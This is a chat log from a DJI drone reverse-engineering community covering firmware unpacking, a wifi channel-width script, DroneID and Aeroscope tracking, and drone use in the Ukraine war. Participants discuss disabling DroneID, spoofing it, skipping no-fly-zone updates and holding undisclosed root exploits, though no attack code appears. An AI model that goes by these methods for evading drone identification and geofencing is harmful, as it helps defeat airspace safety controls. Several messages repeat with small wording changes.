[2022-03-27 02:36:08] hostile : `$ cat ./bin/width_switch.sh #!/bin/sh WIDTH=$1 FREQ=$2 MAC=$3 KEY=$4 if [ "$WIDTH" = "40" ]; then echo "1 0 1 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params echo "0 0 1 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params else echo "1 0 0 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params echo "0 0 0 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params fi echo $WIDTH > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/fw_debug iw dev wlan0 ibss leave if [ -z "$KEY" ]; then iw dev wlan0 ibss join adhoc $FREQ $MAC beacon-interval 200 else iw dev wlan0 ibss join adhoc $FREQ $MAC beacon-interval 200 key d:0:$KEY fi exit 0 `

[2022-03-27 02:36:08] hostile : ```$ cat ./bin/width_switch.sh #!/bin/sh WIDTH=$1 FREQ=$2 MAC=$3 KEY=$4 if [ "$WIDTH" = "40" ]; then echo "1 0 1 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params echo "0 0 1 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params else echo "1 0 0 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params echo "0 0 0 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params fi echo $WIDTH > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/fw_debug iw dev wlan0 ibss leave if [ -z "$KEY" ]; then iw dev wlan0 ibss join adhoc $FREQ $MAC beacon-interval 200 else iw dev wlan0 ibss join adhoc $FREQ $MAC beacon-interval 200 key d:0:$KEY fi exit 0 ```

[2022-03-27 02:37:19] hostile : I wonder if some countries have limitations on the 5mhz channel spacing.

[2022-03-27 02:37:47] hostile : ```$ grep width_switch . -r Binary file ./bin/dji_network matches ```

[2022-03-27 02:39:06] hostile : yup! oh hai there 40mhz channels.

[2022-03-27 02:39:12] hostile :

[2022-03-27 02:53:00] hostile : https://dji-rev.com/dji-rev/pl/eku6i7uwn3ybx8q93ipc97tsdc

[2022-03-27 02:53:14] hostile : https://docs.djicdn.com/Products+info/ZS600C_V2597.zip

[2022-03-27 02:53:54] hostile : https://twitter.com/d0tslash/status/1507913013436854272

[2022-03-27 04:20:11] hostile : Looks to be the RockChip firmware for the AeroScope's crystal sky unit.

[2022-03-27 04:20:18] hostile : ```$ ./rkunpack ../ZS600C_v2597_20180709_m1300.bin rkunpack: info: RKFW signature detected rkunpack: info: version: 5.0.0 rkunpack: info: date: 2018-06-27 23:29:15 rkunpack: info: family: rk32xx rkunpack: info: 00000066-0005b9ec BOOT (size: 375175) rkunpack: info: 0005b9ed-2a20c1f0 embedded-update.img (size: 706414596) unpacked ```

[2022-03-27 04:29:40] hostile : https://mydjiflight.dji.com/links/links/areoscope_type

[2022-03-27 04:30:03] hostile : that looks like the list of detected drone types

[2022-03-27 04:30:44] hostile : ```{ "typeMap": { "1": "Inspire 1", "2": "Phantom 3 Series", "3": "Phantom 3 Series", "4": "Phantom 3 Std", "5": "M100", "6": "ACEONE", "7": "WKM", "8": "NAZA", "9": "A2", "10": "A3", "11": "Phantom 4", "12": "MG1", "14": "M600", "15": "Phantom 3 4k", "16": "Mavic Pro", "17": "Inspire 2", "18": "Phantom 4 Pro", "20": "N2", "21": "Spark", "23": "M600 Pro", "24": "Mavic Air", "25": "M200", "26": "Phantom 4 Series", "27": "Phantom 4 Adv", "28": "M210", "30": "M210RTK", "31": "A3_AG", "32": "MG2", "34": "MG1A", "35": "Phantom 4 RTK", "36": "Phantom 4 Pro V2.0", "38": "MG1P", "40": "MG1P-RTK", "41": "Mavic 2", "44": "M200 V2 Series", "51": "Mavic 2 Enterprise", "53": "Mavic Mini", "58": "Mavic Air 2", "59": "P4M", "60": "M300 RTK", "61": "DJI FPV", "63": "Mini 2", "64": "AGRAS T10", "65": "AGRAS T30", "66": "Air 2S", "67": "M30", "68": "DJI Mavic 3", "69": "Mavic 2 Enterprise Advanced", "70": "Mini SE" }```

[2022-03-27 05:38:26] oakley75 : thanks for that list fr. cant believe a2 and naza are on there ha

[2022-03-27 05:38:26] oakley75 : thanks for that list fr. cant believe a2 is on there ha

[2022-03-27 05:38:26] oakley75 : thanks for that list bro fr. cant believe a2 is on there

[2022-03-27 08:53:53] eddy : eddy joined the channel.

[2022-03-27 09:19:23] matthijst : matthijst joined the channel.

[2022-03-27 13:34:32] hostile : I'm gonna have to walk the country code settings and see which country can't do 5mhz channels, and only gets 40mhz instead. https://fccid.io/B94HHI31C/Letter/Support-Bulletin-1616417.pdf

[2022-03-27 19:00:34] fredmicrowave : And Wookong M (WKM) is here too ! But there is not Wookong H for some reason. I have both, never updated . Interesting to know that they can be detected too.

[2022-03-27 23:28:23] hostile : I'm gonna guess that compatibility only works over lightbridge

[2022-03-27 23:33:43] fredmicrowave : But there is no video system included in Naza or Wookong, you need to provide a separate video TX system ...

[2022-03-27 23:35:01] fredmicrowave : All you get with those is telemetry injected in the video by OSD

[2022-03-27 23:36:30] fredmicrowave : So I guess it would mean that they can only be detected if using lightbridge with them.

[2022-03-27 23:36:30] fredmicrowave : So yes I guess it would mean that they can only be detected if using lightbridge with Naza or WKM , then probably WKH too.

[2022-03-27 23:36:30] fredmicrowave : So I guess it would mean you they can only be detected if using lightbridge with them.

[2022-03-28 00:01:35] hostile : exactly

[2022-03-28 00:03:42] hostile : I just created ~EnhancedWifi to move some of this discussion to the appropriate place re the link specific stuff I'm messing with on the Mini SE and previously messed with on the Spark & Air series

[2022-03-28 00:03:42] hostile : I just created #EnhancedWifi to move some of this discussion to the approprate place re the link specific stuff I'm messing with on the Mini SE and previosuly messed with on the Spark & Air series

[2022-03-28 00:03:42] hostile : I just created #EnhancedWifi to move some of this discussion to the appropriate place re the link specific stuff I'm messing with on the Mini SE and previously messed with on the Spark & Air series

[2022-03-28 00:47:55] cs2000 : cs2000 joined the channel.

[2022-03-28 00:48:15] cs2000 : ~enhancedwifi

[2022-03-28 00:49:04] cs2000 : @hostile just so you know, Mattermost uses the Tilde symbol rather than a hash to link to channels ;)

[2022-03-28 00:49:04] cs2000 : @hostile just so you know, Mattermost uses the Tilde symbol rather than a hash on Mattermost to link to channels ;)

[2022-03-28 00:49:36] cs2000 : @cs2000 left the channel.

[2022-03-28 00:50:01] cs2000 : cs2000 joined the channel.

[2022-03-28 01:29:08] mavic2reverser : mavic2reverser joined the channel.

[2022-03-28 04:35:59] stanlee : stanlee joined the channel.

[2022-03-28 04:57:31] d95gas : d95gas joined the channel.

[2022-03-28 10:14:43] lordhelmchen666 : lordhelmchen666 joined the channel.

[2022-03-28 15:26:28] vladsol2009 : vladsol2009 joined the channel.

[2022-03-28 16:36:07] anethema : anethema joined the channel.

[2022-03-28 16:36:16] anethema : @anethema left the channel.

[2022-03-28 16:50:01] hostile : well I'll be damned! Mavlink has droneID packets now!? https://mavlink.io/en/messages/common.html#OPEN_DRONE_ID_BASIC_ID

[2022-03-28 18:49:12] dkovar : RemoteID packets, of a form. Makes sense if the RemoteID regulations go into effect as planned. This means that vendors using Mavlink can comply quickly.

[2022-03-28 22:02:23] fredmicrowave : Scary to think that with droneId always active, automated infraction detection could be easily implemented in any territory...As soon as you go over 120m, you may get automatically fined. A bit like having a gps in your car that tells when you go over speed limits. Beautiful future.

[2022-03-28 22:03:10] konraditurbe : someone is going to make flightradar24 but for drones and its going to suck

[2022-03-29 00:44:56] hostile : someone has owned dronetrader24.com for a long time, and it does suck

[2022-03-29 00:45:35] hostile : someone owns droneradar24.com and it does suck... I own dronetrader24.com

[2022-03-29 00:46:02] hostile : if we sort out a proper decode technique we should encourage trusted folks to capture and submit to a central DB

[2022-03-29 01:11:08] hostile : also uavionix (adsb in makers for drones) bought the droneradar24 domain, and just redir it to their home page.

[2022-03-29 01:42:55] fredmicrowave : Ah, lucrative anticipation... :nauseated_face: Would be fun to autospoof it .

[2022-03-29 01:42:55] fredmicrowave : Ah, lucrative anticipation... :nauseated_face: Would be fun to autospoof .

[2022-03-29 02:01:08] dkovar : There are a number of efforts to crowdsource and distribute remote ID data already in the works. Some are public safety only, some are true crowd source for the masses.

[2022-03-29 07:24:25] mangadiso : midgelf joined the channel.

[2022-03-29 08:14:23] priegor : priegor joined the channel.

[2022-03-29 12:28:12] flyte9 : flyte9 joined the channel.

[2022-03-29 13:18:13] ucusdyuxljbqrlc : ucusdyuxljbqrlc joined the channel.

[2022-03-29 17:23:20] andris8888 : andris8888 joined the channel.

[2022-03-29 22:47:01] icer : icer joined the channel.

[2022-03-29 22:47:07] icer : Howdy all

[2022-03-29 22:49:04] icer : I like how gangsta hostile is. Just mention something on Twitter and a billion dollar company goes running scared

[2022-03-29 23:17:29] hostile : you should see the in private commentary they are dealing with RN.

[2022-03-29 23:38:21] icer : Crazy?

[2022-03-30 00:13:52] hostile : just having to deal with me and GPL. Maybe soon we wind up with full kernel source for these kernel modules that handle droneID is all I'm sayin ;)

[2022-03-30 01:32:18] mavic2reverser : Maybe because they know they’re hiding from venerabilities in them ?

[2022-03-30 04:14:46] hostile : I love how clean the DJI Fly iOS app decompiles.

[2022-03-30 04:33:03] hostile : also still can't figure out wtf this is.

[2022-03-30 04:33:07] hostile :

[2022-03-30 04:49:08] hostile : similarly unclear what this cached upload is either

[2022-03-30 04:50:03] hostile : one sets a url to /flying_record_upload/secret, and the other to /history_record_upload/secret/gzip. Totally not sus. Unfortunate naming at best.

[2022-03-30 04:51:17] hostile :

[2022-03-30 04:51:51] hostile : like if I were DJI, and I have a cached record upload thing, I'd want to keep it all the fuck away from the word "secret", but maybe that is just me.

[2022-03-30 04:54:22] hostile :

[2022-03-30 04:54:30] hostile : maybe just a china thing?

[2022-03-30 05:04:45] hostile :

[2022-03-30 10:32:04] demion : demion joined the channel.

[2022-03-30 11:11:34] windoze : windoze joined the channel.

[2022-03-30 13:38:02] mavic2reverser : Usually for objective c I like using hopper as it handles decompiling it better BUT dji seemed to leave in all the symbols as ghidra is just as good it looks like!

[2022-03-30 18:35:29] hostile : yuuuup lol

[2022-03-30 19:13:04] faineg : I'm late to this one but I do think that we desperately need something like that we can deploy in war zones for humanitarian aid workers who want everyone to know exactly who they are

[2022-03-30 19:13:29] faineg : in a similar fashion to how Red Cross medical transport aircraft are marked and use various forms of self-ID

[2022-03-30 19:15:07] faineg : Also just spoke to a WSJ reporter about the entire drone situation and she asked if the Russians theoretically *could* turn off the automated self-ID via some sort of hack, which, idk, is that theoretically possible?

[2022-03-30 19:21:05] hostile : sure *we* as a group published the DUML command to disable DroneID years ago. DJI recently removed the App side ability to send the command, and I think beefed up security around it generally speaking. But yeah that isn't "theory" we as a group enabled that years ago

[2022-03-30 19:21:15] hostile : 100% possible on specific firmware version on historic birds

[2022-03-30 19:21:45] hostile : November 23rd 2017... https://nolimitdronez.com/nld-vs-dji-aeroscope

[2022-03-30 19:21:48] faineg : yeah, i told her "sure they could" and referenced your work

[2022-03-30 19:21:57] faineg : wanted to make 100% sure i was right

[2022-03-30 19:21:59] hostile : NLD is composed of "OGs" from here.

[2022-03-30 19:22:09] hostile : good on you for checking accuracy. =]

[2022-03-30 19:23:54] konraditurbe : If both the drone and controller never pick up a GNSS fix. .. the DroneID packets broadcast 0.000,0.000? @hostile

[2022-03-30 19:24:59] hostile : they used to IIRC. It's been a while since I've actively capped em. just got a 1/4 band wifi card today in the mail so I should be able to speak intelligently about the mini, spark, and air series on enhanced wifi

[2022-03-30 19:26:02] faineg : so the ol' tinfoil hat solution would work too, correct

[2022-03-30 19:26:11] konraditurbe : for a few mins yeah

[2022-03-30 19:26:30] konraditurbe : my air2 wrapped in several layers got 7 sats in 10 minutes

[2022-03-30 19:29:05] konraditurbe : the key would be to replace the GNSS board with a "dummy" version, that doesn't carry a GPS antenna but does not burn out the main PCB.

[2022-03-30 19:29:19] hostile : also @faineg don't forget that 'Russians' have been an integral part of the DJI scene just the same. Coptersafe was around very early on https://www.theverge.com/2017/6/21/15848344/drones-russian-software-hack-dji-jailbreak

[2022-03-30 19:29:50] hostile : before we were fully established they were the defacto place to go. https://www.coptersafe.com/product/nfz-mod-phantom-4/

[2022-03-30 19:30:01] hostile : shortly after they moved to using software hacks instead of hardware shims.

[2022-03-30 19:30:04] konraditurbe : Definitively. There are several DJI russian groups on Telegram... And they seem to have their own IOS IPA hack thing.

[2022-03-30 19:30:09] skyninja : flight controller does not work very well without gps. most pilots will have difficulty without gps assistance

[2022-03-30 19:30:31] konraditurbe : ATTI mode or being caught by aeroscope...

[2022-03-30 19:30:39] hostile : ATTI mode or bust! that is a consequence of rookie pilots learning to fly on FPV and never learning LOS.

[2022-03-30 19:31:02] skyninja : just use another brand than DJI.

[2022-03-30 19:31:24] konraditurbe : Wonder when we'll see more FPV type stuff being used. Easier to repair, no aeroscope mess.

[2022-03-30 19:31:30] hostile : we really need to work at porting arducopter / paparazzi or cleanflight or what ever to DJI hardware just to be extra disruptive.

[2022-03-30 19:31:55] konraditurbe : autel doesnt broadcast aeroscope stuff fwiw

[2022-03-30 19:31:56] faineg : that was what i told her as well - you need a pilot who actually knows what they're doing to fly w/o GPS

[2022-03-30 19:32:03] faineg : it's a pain in the ass

[2022-03-30 19:32:12] faineg : well, if you're not experienced anyway

[2022-03-30 19:32:20] konraditurbe : Losing a drone can be potentially damaging too

[2022-03-30 19:32:26] faineg : indeed

[2022-03-30 19:32:28] konraditurbe : SD card can snitch on your position

[2022-03-30 19:32:37] faineg : oh we worry about that a LOT in humanitarian aid

[2022-03-30 19:32:45] faineg : and i wish we had better data self destruct solutions

[2022-03-30 19:33:15] joonas : betaflight for non gps and inav for gps assisted flight would be the fw-s de jour if you want the latest in flight performance.

[2022-03-30 19:33:15] joonas : betaflight for non gps and inav for gps assisted flight would be the fw-s de jour.

[2022-03-30 19:33:15] joonas : betaflight for non gps and inav for gps assisted flight would be the fw-s du jour if you want the latest in flight performance.

[2022-03-30 19:33:52] hostile : I'm really glad we killed openpilot / dev rot happened. Cuz we had this morality issue with the maturity of our gps / nav code too

[2022-03-30 19:34:03] konraditurbe : My worry is that European Mavic3 drones broadcast EU DroneID packets over WiFi/BLE which can be picked up by nearby phones, wonder what gets the code kicked in: being activated in EU, or actually flying in EU.

[2022-03-30 19:34:15] hostile : GPS assist + rattitude was fucking nasty. https://www.youtube.com/watch?v=3D8BzaadYoI

[2022-03-30 19:34:29] konraditurbe : That DJI dealer was saying to activate drones outside UA... and most drones are purchased in the EU..

[2022-03-30 19:34:30] mavic2reverser : there are ways to fly without logging :)

[2022-03-30 19:36:05] faineg : more contemplating stuff like "i've got all these close-up photos of a refugee camp with a minority population that XYZ attacking military hates and they could use those for nefarious ends if they get the SD card"

[2022-03-30 19:36:41] konraditurbe : @hostile was there a param or something to remove the logging for dji assistant on earlier drones (spark)? iirc I had it on but forgot what it was

[2022-03-30 19:36:49] faineg : that's a damn good question

[2022-03-30 19:36:55] mavic2reverser : ah! the enterprise versions of dji products support sd card encryption I believe, haven't poked at it more than that

[2022-03-30 19:37:03] hostile : you are asking me to tap into long gone brain cells @konraditurbe =]

[2022-03-30 19:37:29] faineg : yeah i need to update my knowledge on what's encrypted and what isn't nowadays

[2022-03-30 19:37:34] faineg : SD card wise

[2022-03-30 19:37:59] konraditurbe : videos and photos are not encrypted on consumer mavics.

[2022-03-30 19:37:59] konraditurbe : videos and photos are not encrypted on mavics.

[2022-03-30 19:38:00] mavic2reverser : I think it was mostly in response to allow dji to sell to governments

[2022-03-30 19:38:17] faineg : any other gems of wisdom about Aeroscope i should convey to the WSJ reporter (who seems good but definitely doesn't know anything about drones)

[2022-03-30 19:38:43] konraditurbe : but if you take out the sd card you can have your phone/tablet "record" the FPV stream, and have that as the video, instead of recording to the drone

[2022-03-30 19:38:51] faineg : i gave her your twitter handle with a general "check this out regarding the 'can DJI actually access all this data about who's flying what where or not'" question @hostile

[2022-03-30 19:39:25] faineg : yeah, so in these cases people are usually doing mapping missions and off the top of my head that wouldn't work

[2022-03-30 19:39:39] faineg : would work just fine for search and rescue stuff, certainly

[2022-03-30 19:40:00] konraditurbe : People are hyping up aeroscope too much, max range on the mobile unit is 7km.

[2022-03-30 19:40:05] faineg : seriously

[2022-03-30 19:40:08] faineg : i'll remind her of that

[2022-03-30 19:40:12] faineg : i forget that people don't know that

[2022-03-30 19:41:17] faineg : she also asked me if the russians could have "hacked Aeroscope to reveal the pilot position" which I had to clear

[2022-03-30 19:41:22] faineg : up for her

[2022-03-30 19:41:52] skyninja : both sides are using dji drones and Aeroscope. more knowledge/awareness to the general audience: will that help UA?

[2022-03-30 19:42:37] faineg : that's the other thing i'm trying to impress on her - also sending over my spreadsheet - everyone is goddamn using these things right now, including journalists and probably some random civilians

[2022-03-30 19:42:53] faineg : that's also what i'm yelling about a lot to the humanitarians and the international humanitarian law people - everyone has them!

[2022-03-30 19:43:38] konraditurbe : and DJI cannot just "deactivate all aeroscopes", but they can stop issuing new activation accounts based on criteria (eg: email handler is Russian). https://dl.djicdn.com/downloads/AEROSCOPE/20190925/Aeroscope_Management_System_User_Guide_EN.pdf

[2022-03-30 19:44:04] konraditurbe : Yeah and DJI has said they will continue to sell in Russia :(

[2022-03-30 19:44:37] skyninja : if UA is smart they do not use consumer drones for warfare.

[2022-03-30 19:45:01] faineg : UA is using DJI stuff *constantly*

[2022-03-30 19:45:31] hostile : just make sure she see's this old, still applicable gem @faineg https://twitter.com/d0tslash/status/1087373231152160768 we should getting a version on steroids out soon that can do occusync also. Ukrainians literally begging me every day to put out an up to date spoofer.

[2022-03-30 19:45:39] faineg : if you scan through the spreadsheet of small drone incidents in Ukraine I've been maintaining, a whole lot of confirmed DJI appearances https://docs.google.com/spreadsheets/d/1NtgseODXGSAomx6G5Efwz4XY6AuYF9ZjGSGiCxvNHXE/edit?usp=sharing

[2022-03-30 19:46:50] hostile : https://dji-rev.com/dji-rev/pl/3xgb5yspufn4mrzd8ntax8gowh probably a big feat to modify an aeroscope for this, but CUAS is very capable of that. There's probably a DUML packet to "update home position" which you can in essence query it from the pilots app. But depends on lots of things.

[2022-03-30 19:47:16] konraditurbe : Oh and to the topic of drone NFZs: you can literally skip the updates lol, so I love how DJI flexes they can set NFZs, but when you boot the app it asks you if you want to get new NFZs and you can just cancel

[2022-03-30 19:47:17] hostile : I hope soon to demonstrated some things I could not talk about previously after a bit more research time. DUML is a rich protocol

[2022-03-30 19:48:07] hostile : what about with an amplifier and antenna tho?

[2022-03-30 19:48:07] konraditurbe : Wait, but Aeroscope can reveal the RC position.

[2022-03-30 19:48:35] konraditurbe : Still need to see conclusive evidence it has been used by any side.

[2022-03-30 19:48:35] hostile : from the droneID packet home position eh?

[2022-03-30 19:48:41] hostile : not *current* standing location

[2022-03-30 19:48:47] konraditurbe : Ah yep

[2022-03-30 19:49:06] hostile : I've personally been messaged by special forces on Ukrainian side making this claim begging me for help spoofing Konrad.

[2022-03-30 19:49:10] hostile : as recently as this morning

[2022-03-30 19:49:44] konraditurbe : Time to get them ESP32s.

[2022-03-30 19:49:59] konraditurbe : @faineg good explainer on aeroscope: https://youtu.be/wB55Gq0X-rQ

[2022-03-30 19:50:00] faineg : claims about it being used against them?

[2022-03-30 19:50:12] hostile : yes my old H.A.R.D (hackers against remote droneID) code gets refrenced VERY frequently

[2022-03-30 19:50:24] hostile : lemme DM you faine

[2022-03-30 19:50:41] faineg : i'm interested as i've also been keeping an eye out for examples of aeroscope being used in the wild to harm the Ukrainians

[2022-03-30 19:51:59] konraditurbe : @hostile Huh, seems the RC GPS is being sent to bird and getting broadcasted (pilot vs home location)

[2022-03-30 19:52:19] konraditurbe : (This is from Aerial Armor, which uses AS as backbone)

[2022-03-30 19:52:54] hostile : there ya go. I did not know Pilot Coordinate was added to the structure. That was one of the things I was set to confirm asap.

[2022-03-30 19:53:12] konraditurbe : Yep, pilot position, aka RC GPS gets sent in real time: https://youtu.be/wB55Gq0X-rQ?t=340

[2022-03-30 19:54:07] konraditurbe : This is the claim: https://twitter.com/vshymanskyy/status/1503743071627927565

[2022-03-30 19:54:34] konraditurbe : Could be coincidence, or they spotted him another way

[2022-03-30 19:56:13] faineg : I've seen that one, thought it was from 2016?

[2022-03-30 19:56:16] faineg : Or 2017

[2022-03-30 19:56:25] hostile : that video is at least 2 years old too. Folks keep trying to associate with recent combat

[2022-03-30 19:57:52] faineg : yeah, it's definitely not from the current situation

[2022-03-30 19:58:05] konraditurbe : not much of a choice using dji/autel vs DIY, dual export control laws and wassenaar agreement keeps the high end stuff from being imported to UA.

[2022-03-30 19:58:13] faineg : i believe it's happening, just hard to go public with it w/o some kind of video proof or an official source i suppose

[2022-03-30 19:58:53] faineg : i know the Ukrainians appear to have some pretty great home-built stuff but re-upping the supply is going to be a real pain in the ass right now

[2022-03-30 19:58:57] faineg : https://www.theguardian.com/world/2022/mar/28/the-drone-operators-who-halted-the-russian-armoured-vehicles-heading-for-kyiv

[2022-03-30 19:58:59] faineg : etc etc etc

[2022-03-30 19:59:01] konraditurbe : Autel drones are also being flown, and @mainframe found some sketchy stuff with the way the data is handled.

[2022-03-30 19:59:16] faineg : yeah, i've definitely seen the Autels and god only knows what's going on there

[2022-03-30 19:59:21] faineg : can you link me?

[2022-03-30 19:59:23] konraditurbe : nothing good

[2022-03-30 19:59:44] konraditurbe : lets say the app talks too much

[2022-03-30 19:59:52] faineg : color me unsurprised

[2022-03-30 20:02:11] konraditurbe : From a http capture session @mainframe sent me: The app sends the location to their server, in order to query for NFZs every 20 or so seconds. So autel does have visibility as to which drones are being flown and where.

[2022-03-30 20:02:12] konraditurbe :

[2022-03-30 20:02:39] faineg : ugh, do we know if the ukrainians know

[2022-03-30 20:02:41] konraditurbe : There's also some "bug" but still needs to be confirmed

[2022-03-30 20:03:05] konraditurbe : I'm in touch with Ukrainian soldiers and volunteers, and I keep saying to always keep the phone in airplane mode

[2022-03-30 20:03:17] konraditurbe : No GPS fix, no internet, none of that

[2022-03-30 20:03:34] faineg : are they sticking to that or?

[2022-03-30 20:03:59] faineg : wired just asked me to write something and i should probably get in touch with some of those guys

[2022-03-30 20:04:38] konraditurbe : From what one guy told me, yeah, using tablets.

[2022-03-30 20:05:35] faineg : Good

[2022-03-30 20:05:55] konraditurbe : But you know some will just pop their phones into the RC

[2022-03-30 20:06:16] faineg : a constant struggle with running drone data collection teams under normal conditions in my experience

[2022-03-30 20:06:20] faineg : much less war zones

[2022-03-30 20:07:46] konraditurbe : On some older drones, eg spark, the drone could not fly for too high if it had no GPS fix but this can be modifed: https://wiki.dji-rev.com/howto/parameterhacks

[2022-03-30 20:08:36] faineg : vast majority of stuff i'm seeing seems to be mavics, if that aligns with what everyone else is seeing/hearing

[2022-03-30 20:09:19] konraditurbe : yeah lots of newer drones of course, mavic3/air2/air2s/minis

[2022-03-30 20:10:02] hostile : they use some real obscure shit for their video link (Autel) DVB-T encrypted. I could never crack the key.

[2022-03-30 20:10:29] hostile : I did have some 0day for services on the drones to pop root back in the day that I never disclosed =]

[2022-03-30 20:10:31] faineg : at some point i'll try to sit down and do a comprehensive catalog/ID, but just trying to log everything in the firehose of information in that spreadsheet for now

[2022-03-30 20:11:25] hostile : @faineg older mavics would be preferable... as they represent the height of this groups fame and control over DJI product line. Before DJI had to get real serious and kick their game up.

[2022-03-30 20:11:40] konraditurbe : @faineg if you can, ask DJI about their plans for a NFZ, I found it funny *they* were the ones who brought it up, and if its ever enacted over UA sky, who will DJI give out unlocks to? On what criteria?

[2022-03-30 20:11:48] hostile : activation hacks, droneid hacks, firmware param hacks, etc.

[2022-03-30 20:11:57] konraditurbe : We havent seem many older mavics being used.

[2022-03-30 20:12:08] konraditurbe : Most drone donations are newer mavics.

[2022-03-30 20:12:19] skyninja : Parrot Anafi, also version with thermal. no funny stuff, you can fly it without thing going to the cloud.

[2022-03-30 20:12:19] hostile : @konraditurbe they will say "the UA gov doesn't want that, they wanna freely use drones" or some bullshit.

[2022-03-30 20:12:48] konraditurbe : Yep @faineg 2017-2018 was the golden era, so much good stuff

[2022-03-30 20:12:51] faineg : i thought it was the Ukrainian vice PM who brought it up https://twitter.com/FedorovMykhailo/status/1504068644195733504/photo/1

[2022-03-30 20:12:59] hostile : @konraditurbe I meant for troops... not using donations.

[2022-03-30 20:13:10] faineg : or i guess he implied but didn't actually say "NFZ"

[2022-03-30 20:13:48] faineg : @konraditurbe personally i'd be utterly shocked if they ever use a NFZ over this war

[2022-03-30 20:13:55] konraditurbe : Yeah, he asked for drone deactivation based on criteria, but not a NoFlyZone. a NFZ is the opposite, activate based on criteria

[2022-03-30 20:14:33] faineg : true, i suppose i'm mentally lumping them together - and indeed, last thing Ukraine wants is a blanket NFZ

[2022-03-30 20:14:36] konraditurbe : Can Russians use mastercard/visa? Because you can buy drone-hacks or nld to bypass NFZs, but doubt those companies will sell to Russians

[2022-03-30 20:15:12] hostile : I mean we can pretend they don't have access to our old duml work just the same

[2022-03-30 20:15:20] faineg : https://nolimitdronez.com/free-no-limit-dronez-license

[2022-03-30 20:15:24] konraditurbe : yep

[2022-03-30 20:15:27] faineg : thought they were giving them free to Russians too

[2022-03-30 20:15:44] konraditurbe : I was in their discord, they said they were vetting each one

[2022-03-30 20:15:53] konraditurbe : dont know how bulletproof that is

[2022-03-30 20:16:06] faineg : yeah, i assumed it'd be case by case, but i also question how bulletproof that is

[2022-03-30 20:16:14] faineg : https://www.reuters.com/business/finance/visa-suspends-operations-russia-over-ukraine-invasion-2022-03-05/

[2022-03-30 20:16:18] faineg : visa and mastercard are suspended

[2022-03-30 20:16:36] konraditurbe : well, they cant buy drone hacks, which supports the newer birds lol

[2022-03-30 20:17:03] konraditurbe : but as I said earlier, even a NFZ is only useful if you update your database, which you can skip, or just keep the tablet offline

[2022-03-30 20:17:11] faineg : oh yes, exactly

[2022-03-30 20:17:20] faineg : NFZ far as i'm concerned really only work for the dumb or lazy

[2022-03-30 20:17:53] faineg : keeps out a few actors but in a war with two technically competent sides...not going to do a fat lot of good

[2022-03-30 20:18:20] konraditurbe : Exactly

[2022-03-30 20:18:37] faineg : i make that point in the foreign policy piece i've got coming out hopefully in a couple days

[2022-03-30 20:18:58] faineg : trying to explain to the layman/non-drone-using experience why it can be very dangerous to fly consumer drones in conflict zones

[2022-03-30 20:18:58] faineg : trying to explain to the layman/non-drone-using crowd why it can be very dangerous to fly consumer drones in conflict zones

[2022-03-30 20:19:51] faineg : inspired by a few worrisome posts i've seen by that audience about how drones will make people safer without any apparent awareness of the drawbacks

[2022-03-30 20:22:13] konraditurbe : The sentiment among the volunteers for dji is good, since its allowing them to have advantage, but now with aeroscope being known its turning the tide.

[2022-03-30 20:23:24] faineg : one of those cases where i just want to make totally sure everyone involved knows the risks and the beneftis

[2022-03-30 20:23:24] faineg : one of those cases where i just want to make totally sure everyone involved knows the risks and the benefits

[2022-03-30 20:25:03] faineg : really good y'all are advising the UA guys on that stuff

[2022-03-30 20:25:31] hostile : lol semi related... going thorugh my old receipts...

[2022-03-30 20:25:36] hostile :

[2022-03-30 20:25:49] faineg : all of this generally makes me think it'd be good for this group to produce like a one-pager or a brochure that could easily be translated into multiple languages on basic "how not to get killed while flying a consumer drone" advice

[2022-03-30 20:25:53] hostile :

[2022-03-30 20:25:56] faineg : so many people globally could probably stand to see that

[2022-03-30 20:26:15] hostile : there is one circulating in private now feine... and for opsec... it is kept private

[2022-03-30 20:26:21] hostile : in case there are flaws in the method

[2022-03-30 20:26:30] hostile :

[2022-03-30 20:26:32] faineg : sensible

[2022-03-30 20:27:14] hostile : I think the photos above are the beginings of the "Supervisor" program that I keep talking about that never existed, and MAY have evolved into flighthub (externally), and who knows what Internally.

[2022-03-30 20:27:15] faineg : i suppose a more general-advice document might be fine to disseminate widely, leaving out specifics (stuff like "airplane mode")

[2022-03-30 20:35:14] faineg : "with the goal of preserving all user data," eh

[2022-03-30 20:35:29] konraditurbe : There was a video that showed the pings to dji server made by dji go4, needs an update for dji fly

[2022-03-30 20:35:51] faineg : hmmm

[2022-03-30 20:36:28] faineg : let me know if you dig that up

[2022-03-30 20:37:28] hostile : We had this page back in the day. https://wiki.dji-rev.com/faq/dataleakage

[2022-03-30 20:37:35] hostile : https://wiki.dji-rev.com/faq/dataleakage/chatter

[2022-03-30 20:37:45] hostile : video linked on second page.

[2022-03-30 20:38:02] hostile : we need to update that

[2022-03-30 20:38:08] hostile : for DJi Fly

[2022-03-30 20:38:11] faineg : hah, i had no idea about the KMs flown thing, jesus

[2022-03-30 20:38:57] faineg : the skypixel thing also, wtf

[2022-03-30 20:40:35] konraditurbe : skypixel is their photo sharing site, you can upload your photos/panoramas to it. Its optional to upload.

[2022-03-30 20:41:28] konraditurbe : Also, is DJI Fly not in the play store due to secneo or due to them being on the US Commerce entity list / various naught lists?

[2022-03-30 20:41:55] faineg : oh yeah i know about skypixel, just didn't see the thing about automatically uploading if you use the in-app FB button

[2022-03-30 20:42:03] faineg : or rather hadn't seen it before

[2022-03-30 20:42:16] hostile : nah Dji Fly is in the play store...

[2022-03-30 20:42:23] hostile : I'm using it on my M1 to dissassemble

